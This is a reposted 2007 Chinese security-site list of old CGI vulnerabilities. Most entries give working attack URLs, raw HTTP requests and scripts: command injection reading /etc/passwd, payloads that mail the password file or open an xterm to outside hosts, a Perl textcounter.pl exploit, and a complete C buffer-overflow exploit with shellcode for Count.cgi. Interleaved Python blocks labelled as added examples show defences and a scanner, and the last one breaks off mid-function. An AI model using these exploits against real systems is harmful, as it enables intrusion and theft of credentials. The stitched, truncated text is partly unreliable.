CGI vulnerability collection - Vulnerability Warning - Heiba Security Net (黑吧安全网)

2007-06-18T00:00:00
ID MYHACK58:62200715848
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-06-18T00:00:00

Description

CGI vulnerability collection

For every CGI hole listed below the simplest fix is the same: delete the program, or rewrite it. That alone closes the hole. Most of what follows is reprinted from the Green forum, with some additions of my own.

I. phf

The phf hole is the classic one; almost every article covers it. It lets you run commands on the server, for example to print /etc/passwd:

lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Can it still be found anywhere today?

II. php.cgi 2.0beta10 and earlier

Reads any file the nobody user can read:

lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

php.cgi 2.1 can only read .shtml files. When going after the password file, remember that the real hashes may live in /etc/master.passwd, /etc/security/passwd or a similar shadow file instead.

III. whois_raw.cgi

lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

IV. faxsurvey

lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

V. textcounter.pl

If textcounter.pl is installed on the server, anyone can run commands with the permissions of the http daemon:

#!/usr/bin/perl
# textcounter.pl exploit (pdoru). The counter passes the document path through
# a shell, so metacharacters smuggled into the URL run as the httpd user.
$URL='http://dtp.kappa.ro/a/test.shtml';    # please DO modify this
$EMAIL='pdoru@pop3.kappa.ro,root';          # please DO modify this

if ($ARGV[0]) {
    $CMD=$ARGV[0];
} else {
    # default payload: mail a process list, /etc/hosts and the environment to $EMAIL
    $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanother_one";
}

# Append ";IFS=8;$CMD;echo|" after the path, then turn every space into ${IFS}
# so the command line survives without any literal whitespace in the URL
# (the old Bourne shell re-splits expansions on IFS, which is now "8").
$text="${URL}/;IFS=8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
#print "$text\n";

system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text);   # if there is no wget, lynx works just as well
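Entries I to V all work the same way: the CGI hands a request parameter to /bin/sh, and a %0a (newline) or ; terminates the intended command and starts the attacker's. The following is an added illustration, not code from the original list. The two handlers are assumed minimal stand-ins for something like whois_raw.cgi, with echo in place of whois so the demo is harmless, and the fqdn parameter name is the one the list uses. It shows the %0a payload succeeding against the string-splicing version and an allow-list plus argv version refusing the same input.

```python
"""Command injection through a CGI query string (added example).

Stand-ins for the old CGIs: `run_vulnerable` splices the decoded parameter
into a shell string, `run_hardened` validates it and calls execve directly.
`echo` replaces the real whois/cat command so nothing sensitive is touched.
"""
import re
import subprocess
import urllib.parse
from typing import List


def get_param(query_string: str, name: str) -> str:
    """First value of `name` in a raw QUERY_STRING, URL-decoded.
    Splits on '&' only (never ';'), like the old CGIs, and independent of
    the Python version's parse_qs defaults."""
    for pair in query_string.split("&"):
        key, _, value = pair.partition("=")
        if urllib.parse.unquote_plus(key) == name:
            return urllib.parse.unquote_plus(value)
    return ""


def vulnerable_command(query_string: str) -> str:
    """Build the command the way whois_raw.cgi did: decode the parameter and
    glue it onto a command string.  %0a decodes to a newline and ';' is a
    command separator, so one parameter becomes two commands."""
    return "echo lookup " + get_param(query_string, "fqdn")


def run_vulnerable(query_string: str) -> str:
    """Hand the spliced string to /bin/sh, as the originals did."""
    proc = subprocess.run(vulnerable_command(query_string), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


# Allow-list: DNS labels of [A-Za-z0-9-] joined by dots, nothing else.
HOSTNAME_RE = re.compile(r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
                         r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")


def hardened_argv(query_string: str) -> List[str]:
    """Validate against the allow-list, then build an argv vector so no shell
    ever parses the value.  fullmatch() is deliberate: a '$'-anchored match()
    accepts a trailing newline, which is exactly the %0a byte."""
    fqdn = get_param(query_string, "fqdn")
    if len(fqdn) > 253 or not HOSTNAME_RE.fullmatch(fqdn):
        raise ValueError("rejected fqdn: %r" % fqdn)
    return ["echo", "lookup", fqdn]


def run_hardened(query_string: str) -> str:
    """List argument and shell=False: the value goes straight to execve, so a
    newline or ';' inside it is just data."""
    proc = subprocess.run(hardened_argv(query_string), capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "fqdn=www.victim.com%0aecho%20INJECTED"   # the %0a trick from the list
    print("vulnerable ->", repr(run_vulnerable(payload)))
    try:
        run_hardened(payload)
    except ValueError as err:
        print("hardened   ->", err)
```

The allow-list is the part that matters: escaping for the shell is fragile (the IFS trick in the script above exists precisely to get around naive space filtering), whereas a strict pattern plus an argv call leaves no shell in the picture at all.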

VI. info2www (some versions, e.g. 1.1)

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$ You have new mail.
$

Honestly, I do not fully understand this one. :(

VII. pfdispaly.cgi

(SGI ships the script under this misspelled name; the list below also writes it as pfdisplay.cgi.)

lynx -source 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

pfdispaly.cgi has a second hole that lets you execute commands:

lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'

or

lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

VIII. wrap

lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

IX. www-sql

Lets you read pages that are supposed to be access-controlled. Type into your browser:

http://your.server/protected/something.html

and you are asked for an account name and password. Go through www-sql instead and you are not:

http://your.server/cgi-bin/www-sql/protected/something.html

X. view-source

lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd

XI. campas

lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

XII. webgais

telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

XIII. websendmail

telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (replace with the actual length of the string passed to the server; here xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rcpt=a&subject=a&content=a

(In HTML copies of this list the part of each payload from the "<" onward is swallowed by the renderer; the two lines above are the complete ones.)

XIV. handler

telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat<TAB>/etc/passwd|?data=Download HTTP/1.0

or

GET /cgi-bin/handler/blah;xwsh<TAB>-display<TAB>yourhost.com/?data=Download

or

GET /cgi-bin/handler/;xterm<TAB>-display<TAB>danish:0<TAB>-e<TAB>/bin/sh|?data=Download

Note that the separator after cat (and between the xwsh/xterm arguments) is a TAB character, not a space. The server complains that it cannot open useless_shit, but the command after the semicolon still runs.

XV. test-cgi

lynx http://www.victim.com/cgi-bin/test-cgi?\whatever

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

To get a listing of an http directory:

lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

This trick does not seem to work. :(

lynx http://www.victim.com/cgi-bin/nph-test-cgi?/

You can also try:

GET /cgi-bin/test-cgi? HTTP/1.0
GET /cgi-bin/test-cgi? x *
GET /cgi-bin/nph-test-cgi? HTTP/1.0
GET /cgi-bin/nph-test-cgi? x *
GET /cgi-bin/test-cgi? x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi? x HTTP/1.0 *

XVI. On some BSD Apache servers you can:

lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

XVII. htmlscript

lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

XVIII. jj.c

The demo CGI program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply appending a shell metacharacter followed by a Unix command. It may require a password, but two known passwords are HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program, running strings on it will probably reveal the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

XIX. FrontPage extensions

Reading http://www.victim.com/_vti_inf.html gives you the FrontPage extensions version and their path on the server. Password files to look for:

http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd

XX. Freestats.com CGI

I have not run into this one myself. Some parts might get mistranslated, so the English original is pasted directly:
John Carlton found the following. He developed an exploit for the free web stats services offered at freestats.com, and supplied the webmaster with proper code to patch the bug.

Start an account with freestats.com, and log in. Click on the area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO". This will call up a file called edit.pl with your user # and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from

<input type=hidden name=account value=your#>

to

<input type=text name=account value="">

Save your page and load it into your browser. There will now be a text input box where the hidden element was before. Simply type a [number] in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to that user profile. But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple JavaScript function. Deep inside the web site authors still have the good old "edit.pl" script. It takes some time to reach it (unlike the path described) but you can reach it directly at:

http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

XXI. Vulnerability in Glimpse HTTP

telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\</etc/passwd;eval$CMD;echo HTTP/1.0

XXII. Count.cgi

The program below only works against Count.cgi 2.4 and earlier:

/################################ count.c ################################/

/* Count.cgi <= 2.4 remote buffer overflow - Gus
 * The query string and User-Agent are copied into a fixed-size stack buffer
 * without a length check. The request built below overwrites the saved
 * return address with `sp`, lands in a NOP sled and runs shellcode that
 * pops an xterm back to the attacker's X display. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
int openhost(char *, int);
void doit(char *, long, char *);

/* Constants: 352 NOPs, then Linux/x86 execve shellcode. The '0' characters
 * in the xterm command line are placeholders that the shellcode overwrites
 * with NUL bytes at run time (a NUL cannot be sent inside the request). */
char shell[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0";

char endpad[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

int main(int argc, char *argv[])
{
    char *shellcode = NULL;
    char *host = NULL;
    int cnt, ver, retcount, dispnum, dotquads[4], offset;
    unsigned long sp;
    char dispname[255];

    offset = sp = cnt = ver = 0;
    fprintf(stderr, "\t%s - Gus\n", argv[0]);
    if (argc < 3)
        usage(argv[0]);
    /* "o:" was missing from the original getopt string, so -o never worked */
    while ((cnt = getopt(argc, argv, "h:d:v:o:")) != EOF) {
        switch (cnt) {
        case 'h':
            host = optarg;
            break;
        case 'd':
            /* display given as a.b.c.d:n; zero-padding keeps the string at
             * exactly 17 bytes, so the NUL the shellcode writes at offset
             * 0x4b lands right after it */
            retcount = sscanf(optarg, "%d.%d.%d.%d:%d", &dotquads[0], &dotquads[1],
                              &dotquads[2], &dotquads[3], &dispnum);
            if (retcount != 5)
                usage(argv[0]);
            sprintf(dispname, "%03d.%03d.%03d.%03d:%01d", dotquads[0], dotquads[1],
                    dotquads[2], dotquads[3], dispnum);
            /* size from dispname, not optarg: the padded form can be longer */
            shellcode = malloc(strlen(shell) + strlen(dispname) + strlen(endpad) + 1);
            sprintf(shellcode, "%s%s%s", shell, dispname, endpad);
            break;
        case 'v':
            ver = atoi(optarg);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
    if (host == NULL || shellcode == NULL)
        usage(argv[0]);
    sp = offset + getsp(ver);
    doit(host, sp, shellcode);
    exit(0);
}

/* Stack pointer to use for each Count.cgi version. YMMV: if it does not
 * work, try -o X with X between -1500 and 1500. */
unsigned long getsp(int ver)
{
    unsigned long sp = 0;

    if (ver == 15) sp = 0xbfffea50;
    if (ver == 20) sp = 0xbfffea50;
    if (ver == 22) sp = 0xbfffeab4;
    if (ver == 23) sp = 0xbfffee38;   /* dunno about this one */
    if (sp == 0) {
        fprintf(stderr, "I don't have an sp for that version, try using the -o option.\n");
        fprintf(stderr, "Versions above 2.4 are patched for this bug.\n");
        exit(1);
    }
    return sp;
}

int usage(char *name)
{
    fprintf(stderr, "\tUsage: %s -h host -d <ip:display> -v <version> [-o <offset>]\n", name);
    fprintf(stderr, "\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n", name);
    exit(1);
}

int openhost(char *host, int port)
{
    int sock;
    struct hostent *he;
    struct sockaddr_in sa;

    he = gethostbyname(host);
    if (he == NULL) {
        perror("Bad hostname\n");
        exit(-1);
    }
    memset(&sa, 0, sizeof sa);
    memcpy(&sa.sin_addr, he->h_addr_list[0], he->h_length);
    sa.sin_port = htons(port);
    sa.sin_family = AF_INET;
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("cannot open socket");
        exit(-1);
    }
    if (connect(sock, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("cannot connect to host");
        exit(-1);
    }
    return sock;
}

/* Build the overflow string: "user=a", one 0x90, the guessed return address
 * repeated up to offset 4132, then the shellcode. It is sent both as the
 * query string and as the User-Agent. */
void doit(char *host, long sp, char *shellcode)
{
    int cnt, sock;
    char qs[7000];
    char chain[] = "user=a";

    for (cnt = 0; cnt < 4132; cnt += 4) {
        qs[cnt + 0] = sp & 0x000000ff;
        qs[cnt + 1] = (sp & 0x0000ff00) >> 8;
        qs[cnt + 2] = (sp & 0x00ff0000) >> 16;
        qs[cnt + 3] = (sp & 0xff000000) >> 24;
    }
    strcpy(qs, chain);
    qs[strlen(chain)] = 0x90;        /* overwrite the NUL strcpy left behind */
    strcpy(&qs[4132], shellcode);

    sock = openhost(host, 80);
    write(sock, "GET /cgi-bin/Count.cgi?", 23);
    write(sock, qs, strlen(qs));
    write(sock, " HTTP/1.0\n", 10);
    write(sock, "User-Agent: ", 12);
    write(sock, qs, strlen(qs));
    write(sock, "\n\n", 2);
    sleep(1);
    close(sock);

    /* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n", qs, qs); */

    /* local test instead of the network request:
    setenv("HTTP_USER_AGENT", qs, 1);
    setenv("QUERY_STRING", qs, 1);
    system("./Count.cgi");
    */
}

Count.cgi can also be used to fetch images from outside the web tree:

http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

XXIII. finger.cgi

lynx http://www.victim.com/cgi-bin/finger?@localhost

Returns the login names of users on the host.

XXIV. man.sh

Robert Moniot found the following. The May 1998 issue of SysAdmin Magazine contains an article, "Web-Enabled Man Pages", which includes source code for a very nice cgi script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page.

XXV. FormHandler.cgi

Add a hidden field to the form that points the reply attachment at /etc/passwd (the field FormHandler.cgi reads is reply_message_attach):

<input type=hidden name="reply_message_attach" value="/etc/passwd">

/etc/passwd then arrives in your mailbox.

XXVI. JFS

I think everyone has seen the article "JFS's detailed walkthrough of breaking into the PCWEEK Linux host"; he got into the host through the photoads CGI package. I have not carried out the attack myself; my understanding from the article is as follows.

First:

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%0a111...111&Phone=11&Subject=la&password=0&CityStPhone=0&Renewed=0"

(Name is %0a followed by a very long run of 1 characters; the run is abbreviated here.) This creates a new ad whose AdNum value gets past the $AdNum check. Then:

lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jpg&AdNum=111...111&DataFile=1&Password=0&FILE_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'

(AdNum is the same long run of 1s.) This creates or overwrites any file the user nobody is allowed to write. I am not sure I have understood it correctly; I cannot find the to_url script in its zip package. Does any comrade know?

XXVII. Backdoors

I have noticed that some versions of cgichk.c now check for the backdoors unlg1.1 and rwwwshell.pl. The first was written by UnlG and I have not seen its source; the second is from THC, and packetstorm has the source of version 1.6.

XXVIII. visadmin.exe

http://omni.server/cgi-bin/visadmin.exe?user=guest

This request makes the server write to its hard disk non-stop until the disk is full.

XXIX. campas

> telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a

root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
....

You know what to do next. :P

XXX. webgais and websendmail

Same POST payloads as in XII and XIII above.

XXXI. wrap

http://sgi.victim/cgi-bin/wrap?/../../../../../etc

Lists the files in the /etc directory.

Below are the names of all the CGI programs likely to contain vulnerabilities; the other, more numerous holes are still being collected. I hope to get your criticism and suggestions.

/cgi-bin/rwwwshell.pl
/cgi-bin/phf
/cgi-bin/Count.cgi
/cgi-bin/test.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/php.cgi
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/webdist.cgi
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/pfdisplay.cgi
/cgi-bin/perl.exe
/cgi-bin/wwwboard.pl
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/cgi-bin/man.sh
/cgi-bin/AT-admin.cgi
/scripts/no-such-file.pl
/vti_bin/shtml.dll
/_vti_inf.html
/_vti_pvt/administrators.pwd
/_vti_pvt/users.pwd
/msadc/Samples/SelectOR/showcode.asp
/scripts/iisadmin/ism.dll?http/dir
/adsamples/config/site.csc
/main.asp%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/input.bat?|dir..\..\windows
/index.asp::$DATA
/cgi-bin/visadmin.exe?user=guest
/?PageServices
/ss.cfg
/cgi-bin/get32.exe|echo%20>c:\file.txt
/cgi-bin/cachemgr.cgi
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/cgi-bin/AT-generate.cgi
/secure/.wwwacl
/secure/.htaccess
/samples/search/webhits.exe
/scripts/srchadm/admin.idq
/cgi-bin/dumpenv.pl
/adminlogin?RCpage=/sysadmin/index.stm
/c:/program
/getdrvrs.exe
/test/test.cgi
/scripts/submit.cgi
/users/scripts/submit.cgi
/ncl_items.html?SUBJECT=2097
/cgi-bin/filemail.pl
/cgi-bin/maillist.pl
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/bnbform.cgi
/cgi-bin/survey.cgi
/cgi-bin/AnyForm2
/cgi-bin/textcounter.pl
/cgi-bin/classifieds.cgi
/cgi-bin/environ.cgi
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-bin/guestbook.cgi
/cgi-bin/edit.pl
/cgi-bin/perlshop.cgi
/_vti_pvt/service.pwd
/_vti_pvt/authors.pwd
/cgi-win/uploader.exe
/../../config.sys
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp4b.htr
/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/openfile.cfm
/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/startstop.html
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe
/cgi-dos/args.bat
/cgi-bin/rguest.exe
/cgi-bin/wguest.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/msads/Samples/SelectOR/showcode.asp
/search97.vts
/carbo.dll
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./config.sys
/....../
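A list like the one above is only useful if you can check your own servers against it, which is what cgichk.c does. The following is an added example, not part of the original list and not cgichk.c itself. The fetch function is injected so the classification logic can be exercised offline against constructed responses; http_fetch performs the real request with http.client for hosts you are authorised to test. The sample list excerpt, canned responses and host name are all constructed. It also uses the bogus /scripts/no-such-file.pl entry from the list as a baseline to catch servers that answer 200 to everything.

```python
"""cgichk-style presence probe for a list of CGI names (added example)."""
import http.client
from typing import Callable, Dict, List, Tuple

# Constructed excerpt of the list above; the real list is much longer.
SAMPLE_LIST = """
/cgi-bin/phf /cgi-bin/Count.cgi /cgi-bin/test-cgi /cgi-bin/nph-test-cgi
/cgi-bin/php.cgi /cgi-bin/handler /scripts/no-such-file.pl
/_vti_pvt/service.pwd /cgi-bin/phf /cgi-bin/wrap?/../../../../../etc
"""

# A deliberately bogus name (it is in the list above) used to detect servers
# that answer 200 to every path ("soft 404").
BASELINE = "/scripts/no-such-file.pl"

Fetcher = Callable[[str, str], Tuple[int, bytes]]


def parse_path_list(text: str) -> List[str]:
    """Whitespace-separated paths, order kept, exact duplicates dropped.
    Query strings stay attached so the probe hits the URL the list names."""
    seen, out = set(), []
    for tok in text.split():
        if tok.startswith("/") and tok not in seen:
            seen.add(tok)
            out.append(tok)
    return out


def classify(status: int, body: bytes) -> str:
    """Map a status code (and a little body) to what it says about the CGI."""
    if status == 404:
        return "absent"
    if status in (401, 403):
        return "present-denied"       # exists but is access-controlled
    if status >= 500:
        return "present-error"        # the CGI ran and died: look closer
    if 300 <= status < 400:
        return "redirect"
    if 200 <= status < 300:
        if b"CGI/1.0 test script report" in body:
            return "present-envdump"  # test-cgi / nph-test-cgi echoing its environment
        return "present"
    return "unknown"


def probe(host: str, paths: List[str], fetch: Fetcher) -> Dict[str, str]:
    """Fetch the baseline first; if the server soft-404s, a bare 200 proves nothing."""
    base_status, _ = fetch(host, BASELINE)
    soft404 = 200 <= base_status < 300
    results: Dict[str, str] = {}
    for path in paths:
        if path == BASELINE:
            continue
        verdict = classify(*fetch(host, path))
        if soft404 and verdict == "present":
            verdict = "unreliable"
        results[path] = verdict
    return results


def http_fetch(host: str, path: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Real GET over port 80; returns (status, first 4 KiB of the body)."""
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", path, headers={"User-Agent": "cgi-list-probe"})
        resp = conn.getresponse()
        return resp.status, resp.read(4096)
    finally:
        conn.close()


# Constructed canned responses standing in for a real server.
CANNED = {
    "/cgi-bin/phf": (200, b"<H1>Query Results</H1>"),
    "/cgi-bin/test-cgi": (200, b"CGI/1.0 test script report:\n\nargc is 0. argv is .\n"),
    "/cgi-bin/Count.cgi": (500, b"Internal Server Error"),
    "/_vti_pvt/service.pwd": (403, b"Forbidden"),
}


def canned_fetch(host: str, path: str) -> Tuple[int, bytes]:
    return CANNED.get(path, (404, b"Not Found"))


def soft404_fetch(host: str, path: str) -> Tuple[int, bytes]:
    """A server that answers 200 to every path, to exercise the baseline check."""
    return 200, b"<html>welcome</html>"


if __name__ == "__main__":
    for path, verdict in probe("www.victim.com", parse_path_list(SAMPLE_LIST), canned_fetch).items():
        print("%-40s %s" % (path, verdict))
```

Swap canned_fetch for http_fetch to run it for real. A 403 or 500 is as interesting as a 200: the file is there, and a 500 usually means the CGI started and crashed on the odd query string.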
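Several entries above are one bug: a file name from the request is glued onto a directory and opened, so ../ walks out of the tree (pfdispaly.cgi, wrap, view-source, htmlscript, the Count.cgi image= trick) and a %00 ends the name early in C so a .gif extension check passes while a different file is written (the photoads FILE_NAME entry). The following is an added example, not code from the original list; serve_file is an assumed minimal CGI-style handler, and the document root and file names are constructed. It shows the naive resolution reading a file beside the document root and a hardened resolution rejecting the same payloads.

```python
"""Path traversal and NUL truncation in a file-serving CGI (added example)."""
import os
import shutil
import tempfile
import urllib.parse


def naive_resolve(docroot: str, requested: str) -> str:
    """What the old CGIs did: decode the name and glue it onto the root."""
    return os.path.join(docroot, urllib.parse.unquote(requested).lstrip("/"))


def safe_resolve(docroot: str, requested: str) -> str:
    """Decode, reject NUL (C code truncates the name there, so `x%00.gif`
    passes an extension check yet opens `x`), canonicalise with realpath
    (collapses `..` and follows symlinks) and require the result to stay
    inside the root.  Returns the real path or raises ValueError."""
    name = urllib.parse.unquote(requested)
    if "\x00" in name:
        raise ValueError("NUL byte in path: %r" % requested)
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, name.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("escapes document root: %r" % requested)
    return target


def serve_file(docroot: str, requested: str) -> bytes:
    """Hardened handler: only files under docroot are ever opened."""
    with open(safe_resolve(docroot, requested), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Throwaway root with one public file and one secret file beside it;
    returns what each handler does with the traversal payloads from the list."""
    base = tempfile.mkdtemp()
    try:
        root = os.path.join(base, "htdocs")
        os.mkdir(root)
        with open(os.path.join(root, "motd.txt"), "wb") as fh:
            fh.write(b"welcome\n")
        with open(os.path.join(base, "secret"), "wb") as fh:
            fh.write(b"hunter2\n")

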